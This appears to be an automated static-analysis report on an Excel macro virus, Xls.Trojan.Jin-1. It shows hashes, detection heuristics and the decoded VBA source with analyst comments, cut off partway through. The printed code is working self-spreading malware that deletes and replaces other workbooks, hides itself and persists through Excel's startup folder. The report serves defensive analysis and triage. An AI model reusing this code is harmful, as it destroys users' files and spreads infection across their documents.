Xls.Trojan.Jin-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 2b21a6f54cf32240…

MALICIOUS

Office (OLE)

55.5 KB Created: 1601-01-01 00:00:00 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: ea3b354367c8a721aacd854b9ff33243 SHA-1: 530af52b499a9f55f8de6a1048b669aed1f5f404 SHA-256: 2b21a6f54cf3224012949b73782955956955aea65e00eec10507c33205265d07
180 Risk Score

Malware Insights

Xls.Trojan.Jin-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

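The sample is a macro-enabled Excel file identified by ClamAV as Xls.Trojan.Jin-1. The Auto_Open macro attempts to infect other open workbooks: it copies each target workbook's sheets into the infected workbook, deletes the target file, and saves the infected workbook under the target's path, so the malicious content spreads inside what looks like the original document. The VBA code is designed to hide its presence (screen updating and alerts are switched off, and the marker sheet "shn" is kept hidden) and to spread to other files. It also saves a copy of itself as shn.xls in Excel's startup folder.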

Heuristics 3

  • ClamAV: Xls.Trojan.Jin-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Jin-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17134 bytes
SHA-256: 45698aa6ec8dd3af70fd6a60e2f928190d4399eeb3c2ee02bafde1b9333b6b18
Detection
ClamAV: Xls.Trojan.Jini-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
' Exported attributes of the ThisWorkbook document module; no code follows them in this preview.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Module1 is the standard module that holds the macro code.
Attribute VB_Name = "Module1"
' Module-level variable. shfstq assigns it the difference between the current date and the
' date stored in cell B76 of the "shn" sheet, then compares it with 30. Note that it is
' declared As String although it is used as a day count.
Dim infperiod As String
Sub auto_open()
' Analyst summary: entry point that Excel runs when the workbook is opened (Auto_Open).
' It does three things, in order:
'   1. For every other open workbook that is not yet marked, merges that workbook's
'      sheets into this one and replaces the file on disk with this macro-carrying copy.
'   2. If shn.xls is absent from Application.StartupPath, saves a stripped copy there.
'   3. Calls shfstq, which repeats the scan and re-schedules itself.
' Indicators visible in this routine: a hidden sheet named "shn", a non-empty cell A1 on
' that sheet used as the "already infected" marker, a date in cell B76, and a file named
' shn.xls in the Excel startup folder.
'Application.DisplayStatusBar = False
' Screen redraw is switched off, so the workbook manipulation below is not shown to the user.
Application.ScreenUpdating = False
'abc = MsgBox("AA", vbYesNo)
' All runtime errors are ignored from here on. In particular, reading Sheets("shn") on a
' workbook that has no such sheet fails silently and leaves virustag Empty.
On Error Resume Next
'openworkbooks = Workbooks.Count
For Each w In Workbooks
    ' Skip the workbook that is currently active.
    If w.Name <> ActiveWorkbook.Name Then
nameis = w.Name
' Infection marker check: value of A1 on the target's "shn" sheet, if that sheet exists.
virustag = Workbooks(nameis).Sheets("shn").Range("A1").Value
' Targets are workbooks whose name does not start with "Book" (presumably new, never-saved
' workbooks with default names - confirm) and whose marker cell is empty.
If Left(nameis, 4) <> "Book" And virustag = Empty Then
infectedworkbook = ActiveWorkbook.Name
' Full path of the target file; it is deleted and then overwritten below.
tobeinfected = Workbooks(nameis).FullName
' Full path of the carrier workbook, kept so it can be reopened after SaveAs.
namesavetoreopen = Workbooks(infectedworkbook).FullName
totalworksheets = Workbooks(nameis).Worksheets.Count
totalworksheets2 = Workbooks(infectedworkbook).Worksheets.Count
Workbooks(infectedworkbook).Sheets("Shn").Visible = True
' Confirmation prompts (sheet deletion, overwrite on save) are suppressed.
Application.DisplayAlerts = False
' Unqualified Worksheets: every sheet whose name is not "shn" is deleted, leaving only the
' marker sheet in the carrier.
For Each ws In Worksheets
    If ws.Name <> "shn" Then
    ws.Delete
    End If
Next ws
' The target's own worksheets are copied into the carrier, in front of the "shn" sheet, so
' the resulting file shows the user's original content.
Workbooks(nameis).Worksheets.Copy Before:=Workbooks(infectedworkbook).Sheets("shn")
Workbooks(infectedworkbook).Sheets("shn").Visible = False
' NOTE(review): "savechanges = False" uses "=" rather than ":=", so it is parsed as a
' comparison passed positionally, not as the named argument SaveChanges. The value
' actually passed may not be False - confirm in a sandbox if it matters.
Workbooks(nameis).Close savechanges = False
' The original target file is deleted from disk ...
Kill tobeinfected
' ... and replaced by the carrier (macro + copied sheets) saved under the same path.
Workbooks(infectedworkbook).SaveAs tobeinfected
' The carrier is reopened from its original path.
Workbooks.Open namesavetoreopen
End If
End If
' Reset the marker so a failed read on the next workbook is seen as "not infected".
virustag = Empty
Next
' Persistence: check whether shn.xls already exists in Excel's startup folder.
xlstartpath = Application.StartupPath
shnfile = Dir(xlstartpath & "\shn.xls")
If shnfile = "" Then
infectedworkbook = ActiveWorkbook.Name
namesavetoreopen = Workbooks(infectedworkbook).FullName
Workbooks(infectedworkbook).Sheets("Shn").Visible = True
Application.DisplayAlerts = False
' Strip every sheet except "shn" before saving the startup copy.
For Each ws In Worksheets
    If ws.Name <> "shn" Then
    ws.Delete
    End If
Next ws
' The current date is written to B76; shfstq later measures elapsed days against it.
Workbooks(infectedworkbook).Sheets("Shn").Range("B76").Value = Date
' The window is hidden before the copy is saved.
ActiveWindow.Visible = False
' Startup copy is written here; for triage and clean-up, look for shn.xls in this folder.
Workbooks(infectedworkbook).SaveAs xlstartpath & "\shn.xls"
'Application.EnableEvents = False
Workbooks.Open namesavetoreopen
'Windows("shn.xls").Close savechanges = True
'Application.EnableEvents = True
End If
' Hand over to the recurring scan routine.
shfstq
'Application.OnTime Now + TimeValue("00:00:30"), "check_files"
End Sub
Sub shfstq()
' Analyst summary: recurring scan routine. It repeats the workbook-replacement logic of
' auto_open with shn.xls as the carrier, restores the startup copy if it is missing,
' runs two further macros once more than 30 days have passed since the date in B76, and
' re-schedules itself with Application.OnTime.
'abc = MsgBox("Checking files", vbYesNo)
Application.ScreenUpdating = False
' Errors are ignored for the rest of the routine.
On Error Resume Next
' Appears intended to remember the currently active workbook's name so it can be
' re-activated after an infection below - confirm; the IsError test wraps a comparison
' with the unassigned variable aa.
If IsError(aa = ActiveWorkbook.Name) = True Then
Else
showworkbook = ActiveWorkbook.Name
End If
'openworkbooks = Workbooks.Count
For Each w In Workbooks
    ' Every open workbook except the carrier shn.xls is examined.
    If w.Name <> "shn.xls" Then
nameis = w.Name
' Infection marker check: A1 on the target's "shn" sheet, Empty if the read fails.
virustag = Workbooks(nameis).Sheets("shn").Range("A1").Value
' Same target filter as in auto_open: name not starting with "Book", marker empty.
If Left(nameis, 4) <> "Book" And virustag = Empty Then
infectedworkbook = "shn.xls"
' Path of the target file that is deleted and overwritten below.
tobeinfected = Workbooks(nameis).FullName
' Path of shn.xls, kept so it can be reopened after SaveAs.
namesavetoreopen = Workbooks(infectedworkbook).FullName
totalworksheets = Workbooks(nameis).Worksheets.Count
'totalworksheets2 = Workbooks(infectedworkbook).Worksheets.Count
Windows(infectedworkbook).Visible = True
Application.DisplayAlerts = False
' The target's worksheets are copied into shn.xls in front of the "shn" sheet.
Workbooks(nameis).Worksheets.Copy Before:=Workbooks(infectedworkbook).Sheets("shn")
Workbooks(infectedworkbook).Sheets("shn").Visible = False
' NOTE(review): "savechanges = False" is a comparison passed positionally, not the named
' argument (":=" is missing); the value actually passed may not be False - confirm.
Workbooks(nameis).Close savechanges = False
' Original file removed from disk, then replaced by the macro-carrying workbook.
Kill tobeinfected
Workbooks(infectedworkbook).SaveAs tobeinfected
' shn.xls is reopened from its own path and focus returns to the user's workbook.
Workbooks.Open namesavetoreopen
Workbooks(showworkbook).Activate
End If
End If
virustag = Empty
Next
' Persistence check: re-create the startup copy if shn.xls is no longer in the startup folder.
xlstartpath = Application.StartupPath
shnfile = Dir(xlstartpath & "\shn.xls")
If shnfile = "" Then
Workbooks("shn.xls").SaveAs xlstartpath & "\shn.xls"
End If
' Days elapsed since the date that auto_open wrote to B76 of the "shn" sheet.
infperiod = Date - Workbooks("shn.xls").Sheets("shn").Range("B76").Value
' Delayed stage: once more than 30 days have elapsed, two further macros in shn.xls are run.
' aista is cut off in this preview and payghamat is not shown, so their effect cannot be
' stated from this listing.
If infperiod > 30 Then
Application.Run ("shn.xls!aista")
Application.Run ("shn.xls!payghamat")
End If

' The routine schedules itself to run again two minutes from now.
Application.OnTime Now + TimeValue("00:02:00"), "shn.xls!shfstq"
End Sub
Sub aista()
On Error Resume Next
Set mymenubar = CommandBars.ActiveMenuBar.Controls.Item(1)
'mymenubar.Delete
Set mymenubars = mymenubar.Controls.Item(1)
alread = mymenubars.Caption
If alread <> "Naya" Then
ST = 77
For changemenu = 1 To 12
Set mymenubars = mymenubar.Contr
... (truncated)